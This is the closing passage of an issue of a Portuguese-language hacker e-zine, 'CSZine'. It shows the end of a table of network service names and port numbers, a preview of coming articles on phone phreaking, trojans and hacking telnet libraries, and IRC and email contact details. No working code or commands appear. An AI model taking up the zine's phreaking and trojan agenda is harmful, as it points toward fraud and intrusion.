88 supdup 95 hostnames 101 iso-tsap 102 x400 103 x400-snd 104 csnet-ns 105 pop-2 109 pop-3 110 pop 110 sunrpc 111 sunrpc 111 auth 113 sftp 115 uucp-path 117 nntp 119 ntp 123 netbios-ns 137 netbios-dgm 138 netbios-ssn 139 imap 143 NeWS 144 exec 512 login 513 shell 514 printer 515 efs 520 tempo 526 courier 530 conference 531 netnews 532 uucp 540 klogin 543 kshell 544 remotefs 556 pcserver 600 kerberos-adm 749 kerberos-sec 750 kerberos_master 751 krb5_prop 754 listen 1025 nterm 1026 kpop 1109 ingreslock 1524 tnet 1600 cfinger 2003 eklogin 2105 krb524 4444 irc 6667 dos 7000 ############################################################################# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# ***Preview*** * Phreaking ; Truques para celulares e telefones a cartão * Bugz ; ????? * Programação ; 2o parte do tutorial de pascal * Virii ; Mais trojans(talvez) * Invasão de privacidade ; Hackeando bibliotecas de telnet * Vivendo ; Não vou dizer pra não roubarem a ideia * Hack, the Art ; ????? ############################################################################# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# CSZine é destribuido no #CSCHANNEL no servidor irc.via-rs.com.br Se tiver alguma duvida, critica ou materia mail-me : cszine@hotmail.com Ou UIN-me : 16623675 By Cheat Struck